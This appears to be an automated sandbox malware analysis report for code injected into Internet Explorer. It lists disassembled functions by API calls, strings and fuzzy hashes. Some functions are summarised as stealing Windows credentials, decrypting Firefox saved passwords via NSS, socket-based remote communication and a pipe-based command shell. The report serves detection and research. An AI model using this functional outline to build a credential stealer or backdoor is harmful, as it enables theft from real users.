      Function 04B4F8FF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101processCOMMON
      Download Yara Rule
      APIs
      • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 04B4F95C
      • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,00000000), ref: 04B4F97F
      • CreateProcessAsUserW.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 04B4F9A0
      • GetLastError.KERNEL32 ref: 04B4F9A6
      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 04B4F9AF
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9C3
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9CD
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9E4
      • CloseHandle.KERNEL32(?,?,?), ref: 04B4F9EE
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandleWow64$Redirection$CreateDisableDuplicateErrorLastProcessRevertTokenUser
      • String ID: winsta0\default
      • API String ID: 1999317843-3985675287
      • Opcode ID: 6f2ba527be6ced2f50c19daa16828a665b305a7f8fbb5c9627ec7cfc5b2aea1e
      • Instruction ID: 33bf030541a9506f7890c1157081ef849efecf1131ea295411bb026a6e057375
      • Opcode Fuzzy Hash: 6f2ba527be6ced2f50c19daa16828a665b305a7f8fbb5c9627ec7cfc5b2aea1e
      • Instruction Fuzzy Hash: 5E31D672D0025DBBEF119FE5CC84DEEBBBDFB84348B1040AAE611A2120D7349A15EB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4B9B9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171encryptionCOMMON
      Download Yara Rule
      APIs
      • CredEnumerateA.ADVAPI32(00000000,00000000,?,?), ref: 04B4BA53
      • GetACP.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 04B4BB33
      • WideCharToMultiByte.KERNEL32(00000000), ref: 04B4BB3A
      • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 04B4BB6F
      • GetACP.KERNEL32(00000000,?,?,?,00000104,00000000,00000000), ref: 04B4BB94
      • WideCharToMultiByte.KERNEL32(00000000), ref: 04B4BB9B
      • CredFree.ADVAPI32(?), ref: 04B4BC05
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharCredMultiWide$CryptDataEnumerateFreeUnprotect
      • String ID: J
      • API String ID: 893111784-1141589763
      • Opcode ID: dceb17305d514938c385a4b3435dabd8d5ea7779688174fb8f9fd14f68ee7994
      • Instruction ID: 2804cc5479fdd5c5c84837b37de672c8f0e801949ec28c8e8e91a5fa242cb6f0
      • Opcode Fuzzy Hash: dceb17305d514938c385a4b3435dabd8d5ea7779688174fb8f9fd14f68ee7994
      • Instruction Fuzzy Hash: 72610E71905228AFDF61DFA8CC88E9ABBB8FF48344F1041D6E50997221D635EE95DF20
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4BC1E Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON
      Download Yara Rule
      APIs
      • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 04B4BC41
      • RtlAllocateHeap.NTDLL(00000000), ref: 04B4BC4A
      • GetProcessHeap.KERNEL32(00000008,?), ref: 04B4BC78
      • RtlAllocateHeap.NTDLL(00000000), ref: 04B4BC7B
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04B4BC9C
      • HeapFree.KERNEL32(00000000), ref: 04B4BC9F
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$Allocate$Free
      • String ID:
      • API String ID: 1005905338-0
      • Opcode ID: b9043c88302088aa9a8752316bc0ec16875efecc17cd3a42d63572b422746d6c
      • Instruction ID: dcdeb1abddab32730a97022a25a8cc91546f611b6d1aad2292683a838da474cc
      • Opcode Fuzzy Hash: b9043c88302088aa9a8752316bc0ec16875efecc17cd3a42d63572b422746d6c
      • Instruction Fuzzy Hash: 46114C70500604BFEB109FB9DC89F6B7BE8EF49254F004459FA59CB290DA75EC008B70
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B67E91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,04B684CE,?,04B5CDC1,?,000000BC,?,00000001,00000000,00000000), ref: 04B67ED0
      • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,04B684CE,?,04B5CDC1,?,000000BC,?,00000001,00000000,00000000), ref: 04B67EF9
      • GetACP.KERNEL32(?,?,04B684CE,?,04B5CDC1,?,000000BC,?,00000001,00000000), ref: 04B67F0D
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: InfoLocale
      • String ID: ACP$OCP
      • API String ID: 2299586839-711371036
      • Opcode ID: 1512fd4a6d3459fc22b24a11f3c214ed9be630b30e9a495451e40dd69873fd5a
      • Instruction ID: c01458cfcd1e08039fa80441d4e13cbbd78a29bffab40a185f7371caf1a6d148
      • Opcode Fuzzy Hash: 1512fd4a6d3459fc22b24a11f3c214ed9be630b30e9a495451e40dd69873fd5a
      • Instruction Fuzzy Hash: 4201843160124BBBEB21DB64EC05F9AB7ACEF0135DF2008D9E506E14C1EF68EE459A64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B58E89 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • IsDebuggerPresent.KERNEL32 ref: 04B5EA6C
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B5EA81
      • UnhandledExceptionFilter.KERNEL32(04B731B8), ref: 04B5EA8C
      • GetCurrentProcess.KERNEL32(C0000409), ref: 04B5EAA8
      • TerminateProcess.KERNEL32(00000000), ref: 04B5EAAF
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: 1085a50ac19711fe3f87b9921478d513be39d169b2b4f873460070a3c27b4d55
      • Instruction ID: f645146b802d55b510d09aee905c84578c606f00bfa343763e68d3c823cbbd88
      • Opcode Fuzzy Hash: 1085a50ac19711fe3f87b9921478d513be39d169b2b4f873460070a3c27b4d55
      • Instruction Fuzzy Hash: 2721CAB6905204DFDB40DF29E244758BFB4FB08314F50405BE90A87381EBB86D888F31
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B64DAD Relevance: 6.2, APIs: 4, Instructions: 155COMMON
      Download Yara Rule
      APIs
      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 04B64E05
        • Part of subcall function 04B5C6E9: Sleep.KERNEL32(00000000), ref: 04B5C711
      • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 04B64EE2
      • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 04B64F02
      • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 04B64F3E
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: InfoLocale$ErrorLastSleep
      • String ID:
      • API String ID: 1708069870-0
      • Opcode ID: b2ab4fb9187a0fbd9d77814d2ff67781439bd7371fc50ab36af0626bbf12e908
      • Instruction ID: 4171acab937b3769f54a88f09f7a9d496fb7b26b0f190b28b031005e0a5dfed3
      • Opcode Fuzzy Hash: b2ab4fb9187a0fbd9d77814d2ff67781439bd7371fc50ab36af0626bbf12e908
      • Instruction Fuzzy Hash: 1D41D671900616AFEF25AF659D40BAB7BB9FF04324F1048E9FC06D2190EB39AD509F64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4BCAA Relevance: 57.9, APIs: 17, Strings: 16, Instructions: 106libraryloaderCOMMON
      Download Yara Rule
      APIs
      • SetCurrentDirectoryA.KERNEL32(?), ref: 04B4BD05
      • LoadLibraryA.KERNEL32(00000000), ref: 04B4BD12
      • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 04B4BD2E
      • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 04B4BD3B
      • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 04B4BD48
      • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 04B4BD55
      • GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 04B4BD62
      • GetProcAddress.KERNEL32(00000000,PK11_CheckUserPassword), ref: 04B4BD6F
      • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 04B4BD7C
      • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 04B4BD89
      • GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 04B4BD96
      • GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 04B4BDA3
      • GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 04B4BDB0
      • GetProcAddress.KERNEL32(00000000,sqlite3_finalize), ref: 04B4BDBD
      • GetProcAddress.KERNEL32(00000000,sqlite3_column_count), ref: 04B4BDCA
      • GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 04B4BDD7
      • GetProcAddress.KERNEL32(00000000,sqlite3_close), ref: 04B4BDE4
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$CurrentDirectoryLibraryLoad
      • String ID: NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$\nss3.dll$sqlite3_close$sqlite3_column_count$sqlite3_column_text$sqlite3_finalize$sqlite3_open$sqlite3_prepare_v2$sqlite3_step
      • API String ID: 2324480696-3779156443
      • Opcode ID: 70a2eb6ed3d1c46b82166396a80a1aee0bb7759b0012953c9d110a5b0c09bf44
      • Instruction ID: 6806637c5e2dc0d89eb07ed3724b137214089002dab7782de9cccf0f6e4da1cc
      • Opcode Fuzzy Hash: 70a2eb6ed3d1c46b82166396a80a1aee0bb7759b0012953c9d110a5b0c09bf44
      • Instruction Fuzzy Hash: BA31E371D44319ABC710AFBA9C49D8BBEFCEF51A54B01449BB414E3260DAB8B9809F70
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B50E66 Relevance: 43.7, APIs: 29, Instructions: 243networksleepthreadCOMMON
      Download Yara Rule
      APIs
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B50E96
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B50EA1
      • setsockopt.WS2_32 ref: 04B50ED8
      • setsockopt.WS2_32(000000FF,00000006,00000001,00000001,00000001), ref: 04B50EEA
      • htons.WS2_32(?), ref: 04B50F05
      • connect.WS2_32(000000FF,?,00000010), ref: 04B50F27
      • closesocket.WS2_32(000000FF), ref: 04B50F3A
      • closesocket.WS2_32(000000FF), ref: 04B50F49
      • Sleep.KERNEL32(00000001), ref: 04B50F51
      • send.WS2_32 ref: 04B50F7E
      • select.WS2_32 ref: 04B50FC1
      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 04B50FD6
      • Sleep.KERNEL32(00000001,00000000,00000001), ref: 04B50FE1
      • recv.WS2_32(00000000,?,00005000,00000000), ref: 04B50FF6
      • closesocket.WS2_32(00000000), ref: 04B5100F
      • closesocket.WS2_32(?), ref: 04B51022
      • gethostbyname.WS2_32(?), ref: 04B51033
      • Sleep.KERNEL32(00000001), ref: 04B51041
      • htons.WS2_32(00000000), ref: 04B51062
      • connect.WS2_32(?,?,00000010), ref: 04B51088
      • send.WS2_32(?,?,?,00000000), ref: 04B510A4
      • Sleep.KERNEL32(00000001), ref: 04B510BB
      • CreateThread.KERNEL32(00000000,00000000,Function_00010A67,00000000,00000000,?), ref: 04B510F9
      • TerminateThread.KERNEL32(00000000,00000000), ref: 04B51108
      • Sleep.KERNEL32(000003E8), ref: 04B51113
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B51121
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B5112C
      • closesocket.WS2_32(000000FF), ref: 04B51145
      • closesocket.WS2_32(?), ref: 04B51154
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: closesocket$Sleep$socket$Threadconnecthtonssendsetsockopt$CreateTerminategethostbynamerecvselect
      • String ID:
      • API String ID: 1817470008-0
      • Opcode ID: 875010776ac362f47f325fb87c5b783839ede3c1ff90fb04e42d41b7679f7586
      • Instruction ID: 734536ee304551d2349acb49ea334841848804ba7799a61123e49a4cc0732cc2
      • Opcode Fuzzy Hash: 875010776ac362f47f325fb87c5b783839ede3c1ff90fb04e42d41b7679f7586
      • Instruction Fuzzy Hash: 66917174900B04AFEB309F68CC89B9AB7B4EF08711F100695FA59E76E1D770AD858F64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B69CCF Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134libraryloaderCOMMONLIBRARYCODE
      Download Yara Rule
      APIs
        • Part of subcall function 04B5EAB7: RtlEncodePointer.NTDLL(00000000), ref: 04B5EAB9
      • LoadLibraryW.KERNEL32(USER32.DLL,04B9D1F0,00000314,00000000), ref: 04B69D0A
      • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 04B69D26
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D37
      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 04B69D44
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D47
      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 04B69D54
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D57
      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 04B69D64
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D67
      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 04B69D78
      • RtlEncodePointer.NTDLL(00000000), ref: 04B69D7B
      • RtlDecodePointer.NTDLL(04B9DB00), ref: 04B69D9D
      • RtlDecodePointer.NTDLL ref: 04B69DA7
      • RtlDecodePointer.NTDLL(?), ref: 04B69DE6
      • RtlDecodePointer.NTDLL(?), ref: 04B69E00
      • RtlDecodePointer.NTDLL(04B9D1F0), ref: 04B69E14
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
      • API String ID: 1951731885-564504941
      • Opcode ID: f749c6e904ce74a6f6cdc0912092eeb3d9071441bc9b8d3dfe8fea2fcf4c1bcb
      • Instruction ID: 7c77b8f45f30c9fd1912fd2fba0a8e0b6a05638d36f721bd9f54f3024d8d72d5
      • Opcode Fuzzy Hash: f749c6e904ce74a6f6cdc0912092eeb3d9071441bc9b8d3dfe8fea2fcf4c1bcb
      • Instruction Fuzzy Hash: 35415EB1D0130AABDF109BBA9D85E6F7BA8EB48344B1408AAE505E3154DB7CED15CB70
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5EE5B Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,04B5BCBD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EE63
      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 04B5EE85
      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 04B5EE92
      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 04B5EE9F
      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 04B5EEAC
      • TlsAlloc.KERNEL32(?,?,04B5BCBD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EEFC
      • TlsSetValue.KERNEL32(00000000,?,?,04B5BCBD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EF17
      • RtlEncodePointer.NTDLL ref: 04B5EF32
      • RtlEncodePointer.NTDLL ref: 04B5EF3F
      • RtlEncodePointer.NTDLL ref: 04B5EF4C
      • RtlEncodePointer.NTDLL ref: 04B5EF59
      • RtlDecodePointer.NTDLL(Function_0001ECBE), ref: 04B5EF7A
      • RtlDecodePointer.NTDLL(00000000), ref: 04B5EFA9
      • GetCurrentThreadId.KERNEL32 ref: 04B5EFBB
        • Part of subcall function 04B5EB3A: RtlDecodePointer.NTDLL(00000005), ref: 04B5EB4B
        • Part of subcall function 04B5EB3A: TlsFree.KERNEL32(00000020,04B5BD80,04B5BD66,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5EB65
        • Part of subcall function 04B5EB3A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 04B65C13
        • Part of subcall function 04B5EB3A: RtlDeleteCriticalSection.NTDLL(00000020), ref: 04B65C3D
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
      • API String ID: 4111557884-3819984048
      • Opcode ID: b0668bab368c4e200064b02e7767868526ab5758234e58dd9c897ce96954c901
      • Instruction ID: eea676e8b379735e990eae2ea8873b97477752df3b331b369793bf71b1ac7bbf
      • Opcode Fuzzy Hash: b0668bab368c4e200064b02e7767868526ab5758234e58dd9c897ce96954c901
      • Instruction Fuzzy Hash: BD3141329043219EEB11AF7AAA046157FA9EB45354B14096BEC14D32B0DF38EE20DF70
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5162A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 245pipeCOMMON
      Download Yara Rule
      APIs
      • GetCurrentProcess.KERNEL32(?,00000000), ref: 04B5165A
      • CreatePipe.KERNEL32(?,?,?,00000000,?,00000000), ref: 04B516B5
      • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,00000000), ref: 04B516D2
      • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,00000000), ref: 04B516EF
      • DuplicateHandle.KERNEL32(?,?,?,?,00000000,00000000,00000002,?,00000000), ref: 04B51719
      • DuplicateHandle.KERNEL32(?,?,?,?,00000000,00000000,00000002,?,00000000), ref: 04B5173D
      • DuplicateHandle.KERNEL32(?,?,?,?,00000000,00000000,00000002,?,00000000), ref: 04B51761
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateDuplicateHandlePipe$CurrentProcess
      • String ID: I can not start %s
      • API String ID: 2614934276-3975370208
      • Opcode ID: 37608dade596d2692c3882bbb09a620eca8710581750bfb59bc1415e3e7bdc1d
      • Instruction ID: ee6369e902f5ab47ac4ed1907e48f542aefe33552c5e21dd641f8e0b3c11d526
      • Opcode Fuzzy Hash: 37608dade596d2692c3882bbb09a620eca8710581750bfb59bc1415e3e7bdc1d
      • Instruction Fuzzy Hash: 1F91E1B2910118AFDB25DF65CC80F9AB7BDEF48254F4049E9F60993161D630BE85DF24
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B53C18 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 347fileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 04B46275: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 04B462A4
        • Part of subcall function 04B46275: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 04B462E5
      • DeleteFileW.KERNEL32(?,00000001,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 04B53E61
      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 04B53F10
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharDeleteFileMultiWide
      • String ID: .cfg$clientpath$clientpath$md5$md5$offset$serverpath$serverpath$size$size$total$total
      • API String ID: 845983722-322701809
      • Opcode ID: b284efc3fcba11cd83f817b23c269fe819d3bd3f7874ac0d7d3c00bb21e2eea3
      • Instruction ID: f27e737e69724f7ffaab46178181c7b32db950e845adfc1bb5c4ab31d0adcf78
      • Opcode Fuzzy Hash: b284efc3fcba11cd83f817b23c269fe819d3bd3f7874ac0d7d3c00bb21e2eea3
      • Instruction Fuzzy Hash: 6AC19071940218AFDF29EBA4CC95EEDB7B8EF59304F0004D9E905A7160EB70BA44DF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4BE04 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 208memoryCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 04B4B841: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Mozilla\Mozilla Firefox,00000000,00000001,00000000), ref: 04B4B85B
      • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\Mozilla Firefox,?,00000104), ref: 04B4BED4
        • Part of subcall function 04B4BCAA: SetCurrentDirectoryA.KERNEL32(?), ref: 04B4BD05
        • Part of subcall function 04B4BCAA: LoadLibraryA.KERNEL32(00000000), ref: 04B4BD12
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 04B4BD2E
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 04B4BD3B
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 04B4BD48
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 04B4BD55
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 04B4BD62
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_CheckUserPassword), ref: 04B4BD6F
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 04B4BD7C
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 04B4BD89
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 04B4BD96
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 04B4BDA3
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 04B4BDB0
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_finalize), ref: 04B4BDBD
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_column_count), ref: 04B4BDCA
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 04B4BDD7
        • Part of subcall function 04B4BCAA: GetProcAddress.KERNEL32(00000000,sqlite3_close), ref: 04B4BDE4
      • ExpandEnvironmentStringsA.KERNEL32(?,00000104), ref: 04B4BEF9
      • GetPrivateProfileStringA.KERNEL32(Profile0,Path,04B71679,?,00000104,?), ref: 04B4BF3F
      • GetProcessHeap.KERNEL32(00000000,?), ref: 04B4C093
      • HeapFree.KERNEL32(00000000), ref: 04B4C09C
      • GetProcessHeap.KERNEL32(00000000,?), ref: 04B4C0A5
      • HeapFree.KERNEL32(00000000), ref: 04B4C0A8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$Heap$EnvironmentExpandFreeProcessStrings$CurrentDirectoryLibraryLoadOpenPrivateProfileString
      • String ID: %ProgramFiles%\Mozilla Firefox$%s\%s$%s\%s\signons.sqlite$Path$Profile0$\profiles.ini
      • API String ID: 662691741-2422494077
      • Opcode ID: f84f9cff077324e2fdcf3cc807236b0c82ce6240e71b2a6d38a0110978b41f19
      • Instruction ID: 9959e9145bba980a1345f19b1ad6ee52e6488aa81197a13c9274821d81f5ec28
      • Opcode Fuzzy Hash: f84f9cff077324e2fdcf3cc807236b0c82ce6240e71b2a6d38a0110978b41f19
      • Instruction Fuzzy Hash: F571ECB280522CAEDF219F64DC45EDABBBDEF88214F0005D6F519E3150DA35AF949F60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300C6EE Relevance: 21.3, APIs: 14, Instructions: 256COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _free
      • String ID:
      • API String ID: 269201875-0
      • Opcode ID: f2dfe58acfb27b59e97d92ff92dbd437b0a33aaaa50f900b6e48d4fa3b098174
      • Instruction ID: b68897c6e97f5a195058240fd73698393d64015657bf74755369cb55ac74b4ad
      • Opcode Fuzzy Hash: f2dfe58acfb27b59e97d92ff92dbd437b0a33aaaa50f900b6e48d4fa3b098174
      • Instruction Fuzzy Hash: C2A10975C01209EFEF10DF94D8849EEBBB5FF48300F18452EE615BA290D7319A60DB95
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301D483 Relevance: 21.1, APIs: 14, Instructions: 95COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock
      • String ID:
      • API String ID: 3889854259-0
      • Opcode ID: 31fcbac28a118d0a83d0a860ce8ee3dcbc92e749a40bd67e00ef5edecd6979de
      • Instruction ID: 52c773146ed7ab18d73de1403ec4b327098a16d538b56b95f5f9ea9762353f7d
      • Opcode Fuzzy Hash: 31fcbac28a118d0a83d0a860ce8ee3dcbc92e749a40bd67e00ef5edecd6979de
      • Instruction Fuzzy Hash: 5D21B139146701ABE721FF24E804AAABBE5EFD1750B10842EE8885A564EF31D9308A51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B6A715 Relevance: 18.5, APIs: 12, Instructions: 494COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
